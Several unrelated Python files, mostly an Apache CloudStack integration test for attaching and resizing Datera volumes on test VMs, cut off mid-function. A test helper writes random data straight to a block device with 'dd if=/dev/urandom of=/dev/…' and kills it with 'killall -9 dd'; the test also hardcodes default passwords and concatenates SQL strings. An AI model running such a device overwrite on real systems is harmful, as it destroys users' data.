# coding=utf-8 """ This file is inspired from hector_quadrotor <http://wiki.ros.org/hector_quadrotor/> """ from __future__ import division from __future__ import with_statement # for python 2.5 import numpy as np import utils import math import printable import addict __author__ = 'Aijun Bai' class DragModel(printable.Printable): def __init__(self, params, verbose=False): super(DragModel, self).__init__(verbose) self.params = addict.Dict() self.params.C_wxy = params('C_wxy', 0.0) self.params.C_wz = params('C_wz', 0.0) self.params.C_mxy = params('C_mxy', 0.0) self.params.C_mz = params('C_mz', 0.0) self.enabled = params('enabled', True) self.u = np.zeros(6) self.y = np.zeros(6) def reset(self): self.u = np.zeros(6) self.y = np.zeros(6) def limit(self, min_, max_): for x in np.nditer(self.u, op_flags=['readwrite']): if math.isnan(x): print 'drag_model contains NaN values: {}'.format(self.drag_model.u) x[...] = 0.0 x[...] = utils.minmax(min_, x, max_) class QuadrotorAerodynamics(printable.Printable): def __init__(self, state, wind, params, verbose=False): super(QuadrotorAerodynamics, self).__init__(verbose) self.state = state self.wind = wind self.drag_model = DragModel(params, self.verbose) self.drag_model.reset() def apply(self, wrench, dt): if self.drag_model.enabled: self.drag_model.u[0] = (self.state.twist.linear[0] - self.wind[0]) self.drag_model.u[1] = -(self.state.twist.linear[1] - self.wind[1]) self.drag_model.u[2] = -(self.state.twist.linear[2] - self.wind[2]) self.drag_model.u[3] = self.state.twist.angular[0] self.drag_model.u[4] = -self.state.twist.angular[1] self.drag_model.u[5] = -self.state.twist.angular[2] self.drag_model.u[0:3] = utils.rotate(self.drag_model.u[0:3], self.state.quaternion) self.drag_model.u[3:6] = utils.rotate(self.drag_model.u[3:6], self.state.quaternion) self.drag_model.limit(-100.0, 100.0) if self.verbose: print utils.pv('self.__class__.__name__') self.f(self.drag_model.u, dt, self.drag_model.y) if self.verbose: utils.pv('self.drag_model') if self.verbose: utils.pv('wrench') if len(wrench): wrench.force.x += -self.drag_model.y[0] wrench.force.y += self.drag_model.y[1] wrench.force.z += self.drag_model.y[2] wrench.torque.x += -self.drag_model.y[3] wrench.torque.y += self.drag_model.y[4] wrench.torque.z += self.drag_model.y[5] else: wrench.force.x = -self.drag_model.y[0] wrench.force.y = self.drag_model.y[1] wrench.force.z = self.drag_model.y[2] wrench.torque.x = -self.drag_model.y[3] wrench.torque.y = self.drag_model.y[4] wrench.torque.z = self.drag_model.y[5] if self.verbose: utils.pv('wrench') return wrench def f(self, u, dt, y): absoluteVelocity = np.linalg.norm(u[0:3]) absoluteAngularVelocity = np.linalg.norm(u[3:6]) y[0] = self.drag_model.params.C_wxy * absoluteVelocity * u[0] y[1] = self.drag_model.params.C_wxy * absoluteVelocity * u[1] y[2] = self.drag_model.params.C_wz * absoluteVelocity * u[2] y[3] = self.drag_model.params.C_mxy * absoluteAngularVelocity * u[3] y[4] = self.drag_model.params.C_mxy * absoluteAngularVelocity * u[4] y[5] = self.drag_model.params.C_mz * absoluteAngularVelocity * u[5]
def alphabet_position(achar): ''' :param achar: a char :return: a zero base ordinal of the char ''' char_ord = ord(achar) if char_ord <= ord('z') and char_ord >= ord('a'): # if a char is lowercase return ord(achar) - ord('a') elif char_ord <= ord('Z') and char_ord >= ord('A'): # if a char is uppercase return ord(achar) - ord('A') else: return char_ord def rotate_character(char, rot): ''' :param char: a string of length 1 :param rot: rot could be negative integer here, but during encryption, the user input has to be digit, since I used isdigit for validation. :return: return the char after rotating rot ''' char_ord = alphabet_position(char) if ord(char) >= ord('a') and ord(char) <= ord('z'): encrypted_ord = (char_ord + rot) % 26 + ord('a') elif ord(char) >= ord('A') and ord(char) <= ord('Z'): encrypted_ord = (char_ord + rot) % 26 + ord('A') else: encrypted_ord = char_ord return chr(encrypted_ord) def encrypt_c(text, rot): ''' :param text: a string :param rot: an integer :return: an encrypted string ''' encrypted = '' for char in text: encrypted += rotate_character(char, rot) return encrypted
# coding: utf-8 import json import shortuuid class JsonParser(object): def _getArticle(self, content): return { 'add_time': content['add_time'], 'status': content['status'], 'type': content['type'], 'title': content['title'], 'detailtime': content['detailtime'], 'imgsid': content['imgsid'], 'imgwh': content['imgwh'], 'pkey': shortuuid.uuid(), 'commCount': content['commCount'], 'pubtime': content['pubtime'], 'mod_time': content['mod_time'], 'cover_img': content['cover_img'], 'content': content['content'] } def _getHotComment(self, content, pkey): if len(content['hotComments']) <= 0: return None models = [] for comment in content['hotComments']: models.append({ 'avatar_sid': comment['avatar_sid'], 'avatar_url': comment['avatar_url'], 'content': comment['content'], 'datetime': comment['datetime'], 'good': comment['good'], 'lou': comment['lou'], 'name': comment['name'], 'timestamp': comment['timestamp'], 'user': comment['user'], 'aid': pkey }) return models def _getUrlsList(self, content, pkey): if len(content['contentJson']) <= 0: return None articleModels = set() imgModels = [] for urlObj in content['contentJson']: if urlObj['type'] == 'img': # host = 'http://iil.3b2o.com/img/show/sid/' + urlObj['sid'] + '/w/576/h/1000/t/0/show.' + urlObj['extension'] imgModels.append({"id": urlObj['sid'], "extension": urlObj['extension']}) elif urlObj['type'] == 'article': host = 'http://zhiboba.3b2o.com/article/showListJson/' + urlObj['sid'] articleModels.add(host) return articleModels, {'imgList': imgModels, 'aid': pkey} def parse(self, url, content): if url is None or content is None: return try: jsonContent = json.loads(content) print(jsonContent['title'].encode("gbk")) # jsonContent['title'] = jsonContent['title'].encode("gbk") # jsonContent['content'] = jsonContent['content'].encode("gbk") article = self._getArticle(jsonContent) hotComment = self._getHotComment(jsonContent, article['pkey']) articleUrlList, imgUrlList = self._getUrlsList(jsonContent, article['pkey']) return articleUrlList, article, hotComment, imgUrlList except Exception as e: raise(e)
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging import unittest import random import os import json import time import math import XenAPI import collections import distutils.util logger = logging.getLogger(__name__) logger_handler = logging.FileHandler('/var/tmp/{}.log'.format(__name__)) logger_formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') logger_handler.setFormatter(logger_formatter) logger.addHandler(logger_handler) logger.setLevel(logging.INFO) # All tests inherit from cloudstackTestCase from marvin.cloudstackTestCase import cloudstackTestCase from nose.plugins.attrib import attr # Import Integration Libraries # base - contains all resources as entities and defines create, delete, list operations on them from marvin.lib.base import (Account, DiskOffering, ServiceOffering, StoragePool, User, VirtualMachine, Volume) # common - commonly used methods for all tests are listed here from marvin.lib.common import (get_domain, get_template, get_zone, list_clusters, list_hosts, list_virtual_machines, list_volumes, list_disk_offering) # utils - utility classes for common cleanup, external library wrappers, etc. 
from marvin.lib.utils import cleanup_resources from marvin.cloudstackAPI import resizeVolume #from dfs_sdk import DateraApi from dfs_sdk import get_api class TestData(): account = "account" capacityBytes = "capacitybytes" capacityIops = "capacityiops" clusterId = "clusterId" managedComputeOffering = "managedComputeoffering" nonManagedComputeOffering = "nonManagedComputeoffering" diskName = "diskname" diskOffering = "diskoffering" domainId = "domainId" hypervisor = "hypervisor" login = "login" mvip = "mvip" password = "password" port = "port" primaryStorage = "primarystorage" provider = "provider" scope = "scope" Datera = "datera" storageTag = "Datera_SAN_1" tags = "tags" templateCacheName = "centos56-x86-64-xen" # TODO templateName = "templatename" testAccount = "testaccount" url = "url" user = "user" username = "username" virtualMachine = "virtualmachine" virtualMachine2 = "virtualmachine2" volume_1 = "volume_1" volume_2 = "volume_2" xenServer = "xenserver" zoneId = "zoneId" def __init__(self): self.testdata = { TestData.Datera: { TestData.mvip: "172.19.2.214", TestData.login: "admin", TestData.password: "password", TestData.port: 80, TestData.url: "https://172.19.2.214:443" }, TestData.xenServer: { TestData.username: "root", TestData.password: "password" }, TestData.account: { "email": "test@test.com", "firstname": "John", "lastname": "Doe", "username": "test", "password": "test" }, TestData.testAccount: { "email": "test2@test2.com", "firstname": "Jane", "lastname": "Doe", "username": "test2", "password": "test" }, TestData.user: { "email": "user@test.com", "firstname": "Jane", "lastname": "Doe", "username": "testuser", "password": "password" }, TestData.primaryStorage: { "name": "Datera-%d" % random.randint(0, 100), TestData.scope: "ZONE", "url": "MVIP=172.19.2.214;SVIP=172.28.214.9;" + "clusterAdminUsername=admin;clusterAdminPassword=password;" + "clusterDefaultMinIops=10000;clusterDefaultMaxIops=15000;" + "numReplicas=3;", TestData.provider: "Datera", TestData.tags: TestData.storageTag, TestData.capacityIops: 4500000, TestData.capacityBytes: 2251799813685248, TestData.hypervisor: "Any" }, TestData.virtualMachine: { "name": "TestVM", "displayname": "TestVM", "privateport": 22, "publicport": 22, "protocol": "tcp" }, TestData.virtualMachine2: { "name": "TestVM2", "displayname": "TestVM2", "privateport": 22, "publicport": 22, "protocol": "tcp" }, TestData.managedComputeOffering: { "name": "DT_CO_1", "displaytext": "DT_CO_1 (Min IOPS = 10,000; Max IOPS = 15,000)", "cpunumber": 1, "cpuspeed": 100, "memory": 128, "storagetype": "shared", "customizediops": False, "miniops": "10000", "maxiops": "15000", "hypervisorsnapshotreserve": 200, "tags": TestData.storageTag }, TestData.nonManagedComputeOffering: { "name": "DT_CO_2", "displaytext": "DT_CO_2 (Min IOPS = 10,000; Max IOPS = 15,000)", "cpunumber": 1, "cpuspeed": 100, "memory": 128, "storagetype": "shared", "customizediops": False, "miniops": "10000", "maxiops": "15000", "hypervisorsnapshotreserve": 200, "tags": TestData.storageTag }, TestData.diskOffering: { "name": "DT_DO_1", "displaytext": "DT_DO_1 (5GB Min IOPS = 300; Max IOPS = 500)", "disksize": 5, "customizediops": False, "miniops": 300, "maxiops": 500, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "testdiskofferings": { "customiopsdo": { "name": "DT_Custom_Iops_DO", "displaytext": "Customized Iops DO", "disksize": 5, "customizediops": True, "miniops": 500, "maxiops": 1000, "hypervisorsnapshotreserve": 200, TestData.tags: 
TestData.storageTag, "storagetype": "shared" }, "customsizedo": { "name": "DT_Custom_Size_DO", "displaytext": "Customized Size DO", "disksize": 5, "customizediops": False, "miniops": 500, "maxiops": 1000, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "customsizeandiopsdo": { "name": "DT_Custom_Iops_Size_DO", "displaytext": "Customized Size and Iops DO", "disksize": 10, "customizediops": True, "miniops": 400, "maxiops": 800, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "newiopsdo": { "name": "DT_New_Iops_DO", "displaytext": "New Iops (min=350, max = 700)", "disksize": 5, "miniops": 350, "maxiops": 700, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "newsizedo": { "name": "DT_New_Size_DO", "displaytext": "New Size: 10", "disksize": 10, "customizediops": False, "miniops": 400, "maxiops": 800, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" }, "newsizeandiopsdo": { "name": "DT_New_Size_Iops_DO", "displaytext": "New Size and Iops", "disksize": 10, "customizediops": False, "miniops": 200, "maxiops": 800, "hypervisorsnapshotreserve": 200, TestData.tags: TestData.storageTag, "storagetype": "shared" } }, TestData.volume_1: { TestData.diskName: "test-volume", }, TestData.volume_2: { TestData.diskName: "test-volume-2", }, TestData.templateName: "tiny linux kvm", # TODO TestData.zoneId: 1, TestData.clusterId: 1, TestData.domainId: 1, } def update(self, overrideFileName): if os.path.exists(overrideFileName): with open(overrideFileName) as fd: self.testdata = self._update(self.testdata, json.loads(fd.read())) def _update(self, d, u): for k, v in u.iteritems(): if isinstance(v, collections.Mapping): r = self.update(d.get(k, {}), v) d[k] = r else: d[k] = u[k] return d class TestVolumes(cloudstackTestCase): _should_only_be_one_vm_in_list_err_msg = "There should only be one VM in this list." _should_only_be_one_volume_in_list_err_msg = "There should only be one volume in this list." _volume_vm_id_and_vm_id_do_not_match_err_msg = "The volume's VM ID and the VM's ID do not match." _vm_not_in_running_state_err_msg = "The VM is not in the 'Running' state." _vm_not_in_stopped_state_err_msg = "The VM is not in the 'Stopped' state." _sr_not_shared_err_msg = "The SR is not shared." _list_should_be_empty = "The list should be empty." _volume_resize_err = "The Volume was not resized correctly." @classmethod def setUpXenServer(cls): # Set up xenAPI connection hosts = list_hosts(cls.apiClient, clusterid=cls.testdata[TestData.clusterId]) xenserver_info = cls.testdata[TestData.xenServer] for h in hosts: host_ip = "https://" + h.ipaddress try: cls.xen_session = XenAPI.Session(host_ip) cls.xen_session.xenapi.login_with_password(xenserver_info[TestData.username], xenserver_info[TestData.password]) break except XenAPI.Failure as e: pass cls.compute_offering = ServiceOffering.create( cls.apiClient, cls.testdata[TestData.managedComputeOffering] ) cls.device_name = 'xvdb' @classmethod def setUpKVM(cls): logger.info("Setting up KVM") # KVM doesn't support root disks cls.compute_offering = ServiceOffering.create( cls.apiClient, cls.testdata[TestData.nonManagedComputeOffering] ) cls.device_name = 'vdb' @classmethod def setUpClass(cls): """ 1. Init ACS API and DB connection 2. Init Datera API connection 3. Create ACS Primary storage 4. Create ACS compute and disk offering. 5. 
Create ACS data disk without attaching to a VM """ logger.info("Setting up Class") # Set up API client testclient = super(TestVolumes, cls).getClsTestClient() cls.apiClient = testclient.getApiClient() cls.dbConnection = testclient.getDbConnection() # Setup test data td = TestData() if cls.config.TestData and cls.config.TestData.Path: td.update(cls.config.TestData.Path) cls.testdata = td.testdata # Get Resources from Cloud Infrastructure cls.zone = get_zone(cls.apiClient, zone_name=cls.config.zones[0].name) cls.cluster = list_clusters(cls.apiClient)[0] cls.template = get_template(cls.apiClient, cls.zone.id) cls.domain = get_domain(cls.apiClient, cls.testdata[TestData.domainId]) # Set up datera connection datera = cls.testdata[TestData.Datera] cls.dt_client = get_api( username=datera[TestData.login], password=datera[TestData.password], hostname=datera[TestData.mvip], version="v2" ) # Create test account cls.account = Account.create( cls.apiClient, cls.testdata["account"], admin=1 ) # Set up connection to make customized API calls cls.user = User.create( cls.apiClient, cls.testdata["user"], account=cls.account.name, domainid=cls.domain.id ) primarystorage = cls.testdata[TestData.primaryStorage] cls.primary_storage = StoragePool.create( cls.apiClient, primarystorage, scope=primarystorage[TestData.scope], zoneid=cls.zone.id, provider=primarystorage[TestData.provider], tags=primarystorage[TestData.tags], capacityiops=primarystorage[TestData.capacityIops], capacitybytes=primarystorage[TestData.capacityBytes], hypervisor=primarystorage[TestData.hypervisor] ) cls.disk_offering = DiskOffering.create( cls.apiClient, cls.testdata[TestData.diskOffering] ) cls.disk_offering_new = DiskOffering.create( cls.apiClient, cls.testdata['testdiskofferings']['newsizeandiopsdo'] ) cls.supports_resign = cls._get_supports_resign() # Set up hypervisor specific connections if cls.cluster.hypervisortype.lower() == 'xenserver': cls.setUpXenServer() if cls.cluster.hypervisortype.lower() == 'kvm': cls.setUpKVM() # Create 1 data volume_1 cls.volume = Volume.create( cls.apiClient, cls.testdata[TestData.volume_1], account=cls.account.name, domainid=cls.domain.id, zoneid=cls.zone.id, diskofferingid=cls.disk_offering.id ) # Resources that are to be destroyed cls._cleanup = [ cls.volume, cls.compute_offering, cls.disk_offering, cls.disk_offering_new, cls.user, cls.account ] @classmethod def tearDownClass(cls): logger.info("Tearing Down Class") try: cleanup_resources(cls.apiClient, cls._cleanup) cls.primary_storage.delete(cls.apiClient) cls._purge_datera_volumes() except Exception as e: logging.debug("Exception in tearDownClass(cls): %s" % e) def setUp(self): logger.info("Setup test") self.attached = False self.cleanup = [] def tearDown(self): logger.info("Tearing Down test") cleanup_resources(self.apiClient, self.cleanup) @classmethod def _set_supports_resign(cls, val): supports_resign = str(val).lower() cls.supports_resign = val # make sure you can connect to MySQL: https://teamtreehouse.com/community/cant-connect-remotely-to-mysql-server-with-mysql-workbench sql_query = "Update host_details Set value = '" + supports_resign + "' Where name = 'supportsResign'" cls.dbConnection.execute(sql_query) sql_query = "Update cluster_details Set value = '" + supports_resign + "' Where name = 'supportsResign'" cls.dbConnection.execute(sql_query) @classmethod def _get_supports_resign(cls): sql_query = "SELECT value from cluster_details Where name='supportsResign' AND cluster_id=%d" % cls.testdata[ TestData.clusterId] sql_result = 
cls.dbConnection.execute(sql_query) logger.warn(sql_result) if len(sql_result) < 1: return False return bool(distutils.util.strtobool(sql_result[0][0].lower())) def _get_cs_storage_pool_db_id(self, storage_pool): return self._get_db_id("storage_pool", storage_pool) def _get_db_id(self, table, db_obj): sql_query = "Select id From " + table + " Where uuid = '" + str(db_obj.id) + "'" sql_result = self.dbConnection.execute(sql_query) return sql_result[0][0] @classmethod def _purge_datera_volumes(cls): logger.warn("Deleting all volumes") for ai in cls.dt_client.app_instances.get().values(): logger.warn(ai) if 'CS-T' in ai['name']: ai.set(admin_state="offline") ai.delete() def test_01_attach_new_volume_to_stopped_VM(self): '''Attach a volume to a stopped virtual machine, then start VM''' # Create VM and volume for tests virtual_machine = VirtualMachine.create( self.apiClient, self.testdata[TestData.virtualMachine], accountid=self.account.name, zoneid=self.zone.id, serviceofferingid=self.compute_offering.id, templateid=self.template.id, domainid=self.domain.id, startvm=True, mode='advanced' ) self.cleanup.append(virtual_machine) template_volume_name = \ self._get_app_instance_name_from_cs_volume(self.template, vol_type='TEMPLATE') dt_volume = self._check_and_get_dt_volume(template_volume_name) virtual_machine.stop(self.apiClient, forced=True) new_volume = Volume.create( self.apiClient, self.testdata[TestData.volume_2], account=self.account.name, domainid=self.domain.id, zoneid=self.zone.id, diskofferingid=self.disk_offering.id ) self.cleanup.append(new_volume) self._check_and_get_cs_volume(new_volume.id, self.testdata[TestData.volume_2][TestData.diskName]) new_volume = virtual_machine.attach_volume( self.apiClient, new_volume ) newvolume = self._check_and_get_cs_volume(new_volume.id, self.testdata[TestData.volume_2][TestData.diskName]) virtual_machine.start(self.apiClient) vm = self._get_vm(virtual_machine.id) self.assertEqual( newvolume.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), "running", TestVolumes._vm_not_in_running_state_err_msg ) dt_volume_size = self._get_volume_size_with_hsr(newvolume) iqn = self._get_iqn(newvolume) dt_new_volname = self._get_app_instance_name_from_cs_volume(newvolume) dt_volume = self._check_and_get_dt_volume(dt_new_volname) self._check_size_and_iops(dt_volume, newvolume, dt_volume_size) initiator_group_name = self._get_initiator_group_name() self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) logger.info("Detach volume from the VM") virtual_machine.detach_volume( self.apiClient, new_volume ) def test_02_attach_detach_attach_volume(self): '''Attach, detach, and attach volume to a running VM''' # Create VM and volume for tests virtual_machine = VirtualMachine.create( self.apiClient, self.testdata[TestData.virtualMachine], accountid=self.account.name, zoneid=self.zone.id, serviceofferingid=self.compute_offering.id, templateid=self.template.id, domainid=self.domain.id, startvm=True, mode='advanced' ) self.cleanup.append(virtual_machine) self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) ####################################### ####################################### # STEP 1: Attach volume to running VM # ####################################### ####################################### self.volume = virtual_machine.attach_volume( self.apiClient, self.volume ) self.attached = True vol = 
self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) initiator_group_name = self._get_initiator_group_name() self.assertEqual( vol.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), 'running', TestVolumes._vm_not_in_running_state_err_msg ) iqn = self._get_iqn(self.volume) dt_volume_size = self._get_volume_size_with_hsr(self.volume) dt_volume_name = self._get_app_instance_name_from_cs_volume(self.volume) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_initiator_group(dt_volume, initiator_group_name) self._check_size_and_iops(dt_volume, vol, dt_volume_size) self._check_hypervisor(iqn) ######################################### ######################################### # STEP 2: Detach volume from running VM # ######################################### ######################################### self.volume = virtual_machine.detach_volume( self.apiClient, self.volume ) self.attached = False vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) self.assertEqual( vol.virtualmachineid, None, "The volume should not be attached to a VM." ) self.assertEqual( vm.state.lower(), 'running', str(vm.state) ) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_initiator_group(dt_volume, initiator_group_name, False) self._check_hypervisor(iqn, False) ####################################### ####################################### # STEP 3: Attach volume to running VM # ####################################### ####################################### time.sleep(30) self.volume = virtual_machine.attach_volume( self.apiClient, self.volume ) self.attached = True vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) self.assertEqual( vol.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) self.assertEqual( vm.state.lower(), 'running', TestVolumes._vm_not_in_running_state_err_msg ) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) def test_03_attached_volume_reboot_VM(self): '''Attach volume to running VM, then reboot.''' # Create VM and volume for tests virtual_machine = VirtualMachine.create( self.apiClient, self.testdata[TestData.virtualMachine], accountid=self.account.name, zoneid=self.zone.id, serviceofferingid=self.compute_offering.id, templateid=self.template.id, domainid=self.domain.id, startvm=True, mode='advanced' ) self.cleanup.append(virtual_machine) self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) ####################################### ####################################### # STEP 1: Attach volume to running VM # ####################################### ####################################### self.volume = virtual_machine.attach_volume( self.apiClient, self.volume ) self.attached = True dt_volume_name = self._get_app_instance_name_from_cs_volume(self.volume) vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) initiator_group_name = self._get_initiator_group_name() self.assertEqual( vol.virtualmachineid, vm.id, TestVolumes._volume_vm_id_and_vm_id_do_not_match_err_msg ) 
self.assertEqual( vm.state.lower(), 'running', TestVolumes._vm_not_in_running_state_err_msg ) iqn = self._get_iqn(self.volume) volume_size_gb = self._get_volume_size_with_hsr(self.volume) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_size_and_iops(dt_volume, vol, volume_size_gb) self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) ####################################### ####################################### # STEP 2: Reboot VM with attached vol # ####################################### ####################################### virtual_machine.reboot(self.apiClient) vol = self._check_and_get_cs_volume(self.volume.id, self.testdata[TestData.volume_1][TestData.diskName]) vm = self._get_vm(virtual_machine.id) iqn = self._get_iqn(self.volume) dt_volume_size = self._get_volume_size_with_hsr(self.volume) dt_volume = self._check_and_get_dt_volume(dt_volume_name) self._check_size_and_iops(dt_volume, vol, dt_volume_size) self._check_initiator_group(dt_volume, initiator_group_name) self._check_hypervisor(iqn) def _check_if_device_visible_in_vm(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "iostat | grep %s" % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) if not res: self.fail("Device %s not found on VM: %s" % (dev_name, vm.ipaddress)) def _check_list(self, in_list, expected_size_of_list, err_msg): self.assertEqual( isinstance(in_list, list), True, "'in_list' is not a list." ) self.assertEqual( len(in_list), expected_size_of_list, err_msg ) def _check_initiator_group(self, dt_volume, initiator_group_name, should_exist=True): volume_initiator_groups = dt_volume['storage_instances']['storage-1']['acl_policy']['initiator_groups'] if should_exist: self.assertTrue( initiator_group_name in volume_initiator_groups[0], "Initiator group not assigned to volume" ) else: self.assertTrue( len(volume_initiator_groups) == 0, "Initiator group still asigined to volume, should have been removed" ) def _check_volume(self, volume, volume_name, disk_offering): self.assertTrue( volume.name.startswith(volume_name), "The volume name is incorrect." ) self.assertEqual( volume.diskofferingid, disk_offering.id, "The disk offering is incorrect." ) self.assertEqual( volume.zoneid, self.zone.id, "The zone is incorrect." ) self.assertEqual( volume.storagetype, self.disk_offering.storagetype, "The storage type is incorrect." 
) def _check_size_and_iops(self, dt_volume, cs_volume, size): dt_max_total_iops = dt_volume['storage_instances']['storage-1']['volumes']['volume-1']['performance_policy'][ 'total_iops_max'] self.assertEqual( dt_max_total_iops, cs_volume.maxiops, "Check QOS - Max IOPS: " + str(dt_max_total_iops) ) dt_volume_size = dt_volume['storage_instances']['storage-1']['volumes']['volume-1']['size'] self.assertEqual( dt_volume_size, size, "Check volume size: " + str(dt_volume_size) ) def _check_and_get_cs_volume(self, volume_id, volume_name, disk_offering=None): if not disk_offering: disk_offering = self.disk_offering list_volumes_response = list_volumes( self.apiClient, id=volume_id ) self._check_list(list_volumes_response, 1, TestVolumes._should_only_be_one_volume_in_list_err_msg) cs_volume = list_volumes_response[0] self._check_volume(cs_volume, volume_name, disk_offering) return cs_volume def _get_app_instance_name_from_cs_volume(self, cs_volume, vol_type='VOLUME'): """ Get Datera app_instance name based on ACS data object types Eg. CS-V-test-volume-7XWJ5Q-dfc41254-371a-40b3-b410-129eb79893c0 """ app_inst_prefix = 'CS' if vol_type == 'VOLUME': vol_type_char = 'V' uuid = cs_volume.id name = cs_volume.name app_instance_name = app_inst_prefix + '-' + vol_type_char + '-' + name + '-' + uuid if vol_type == 'TEMPLATE': vol_type_char = 'T' uuid = cs_volume.id primary_storage_db_id = str(self._get_cs_storage_pool_db_id(self.primary_storage)) app_instance_name = app_inst_prefix + '-' + vol_type_char + '-' + uuid + '-' + primary_storage_db_id return app_instance_name def _get_iqn(self, cs_volume): """ Get IQN for the CS volume from Datera """ app_instance_name = self._get_app_instance_name_from_cs_volume(cs_volume) app_instance = self.dt_client.app_instances.get(app_instance_name) return app_instance['storage_instances']['storage-1']['access']['iqn'] def _get_cs_volume_size_with_hsr(self, cs_volume): disk_size_bytes = cs_volume.size disk_offering_id = cs_volume.diskofferingid disk_offering = list_disk_offering(self.apiClient, id=disk_offering_id)[0] hsr = disk_offering.hypervisorsnapshotreserve disk_size_with_hsr_bytes = disk_size_bytes + (disk_size_bytes * hsr) / 100 disk_size_with_hsr_gb = int(math.ceil(disk_size_with_hsr_bytes / (1024 ** 3))) return disk_size_with_hsr_gb def _get_volume_size_with_hsr(self, cs_volume): app_instance_name = self._get_app_instance_name_from_cs_volume(cs_volume) app_instance = self.dt_client.app_instances.get(app_instance_name) volume_size_gb = app_instance['storage_instances']['storage-1']['volumes']['volume-1']['size'] self.assertEqual( isinstance(volume_size_gb, int), True, "The volume size should be a non-zero integer." 
) return volume_size_gb def _get_initiator_group_name(self): init_group_prefix = 'CS-InitiatorGroup' initiator_group_name = init_group_prefix + '-' + self.cluster.id self.dt_client.initiator_groups.get(initiator_group_name) return initiator_group_name def _get_dt_volumes(self): return self.dt_client.app_instances.get() def _get_vm(self, vm_id): list_vms_response = list_virtual_machines(self.apiClient, id=vm_id) self._check_list(list_vms_response, 1, TestVolumes._should_only_be_one_vm_in_list_err_msg) return list_vms_response[0] def _check_and_get_dt_volume(self, dt_volume_name, should_exist=True): dt_volume = None dt_volumes = self._get_dt_volumes() for volume in dt_volumes.values(): if volume['name'] == dt_volume_name: dt_volume = volume break if should_exist: self.assertNotEqual( dt_volume, None, "Check if Datera volume was created: " + str(dt_volumes) ) else: self.assertEqual( dt_volume, None, "Check if volume was deleted: " + str(dt_volumes) ) return dt_volume def _resize_volume(self, volume, new_disk_offering): cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume.id cmd.diskofferingid = new_disk_offering.id self.apiClient.resizeVolume(cmd) do_size_bytes = int(new_disk_offering.disksize * (1024 ** 3)) retries = 3 success = False while retries > 0: retries -= 1 list_volumes_response = list_volumes( self.apiClient, id=volume.id ) for vol in list_volumes_response: if vol.id == volume.id and \ int(vol.size) == do_size_bytes and \ vol.state == 'Ready': success = True if success: break else: time.sleep(10) self.assertEqual(success, True, self._volume_resize_err) def _check_hypervisor(self, iqn, should_exist=True): if self.cluster.hypervisortype.lower() == 'xenserver': self._check_xen_sr(iqn, should_exist) else: return def _check_xen_sr(self, iqn, should_exist=True): xen_sr_name = "/" + iqn + "/0" if should_exist: xen_sr = self.xen_session.xenapi.SR.get_by_name_label(xen_sr_name)[0] self.sr_shared = self.xen_session.xenapi.SR.get_shared(xen_sr) self.assertEqual( self.sr_shared, True, TestVolumes._sr_not_shared_err_msg ) else: xen_sr = self.xen_session.xenapi.SR.get_by_name_label(xen_sr_name) self._check_list(xen_sr, 0, TestVolumes._list_should_be_empty) def _check_if_device_removed_in_vm(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "iostat | grep %s" % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) if res: self.fail("Device %s still attached on VM: %s" % (dev_name, vm.ipaddress)) def _start_device_io(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "dd if=/dev/urandom of=/dev/%s &" % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) def _stop_device_io(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, e)) cmd = "killall -9 dd" res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) def _get_bytes_written(self, vm, dev_name): try: ssh_client = vm.get_ssh_client() except Exception as e: self.fail("SSH failed for virtual machine: %s - %s" % (vm.ipaddress, 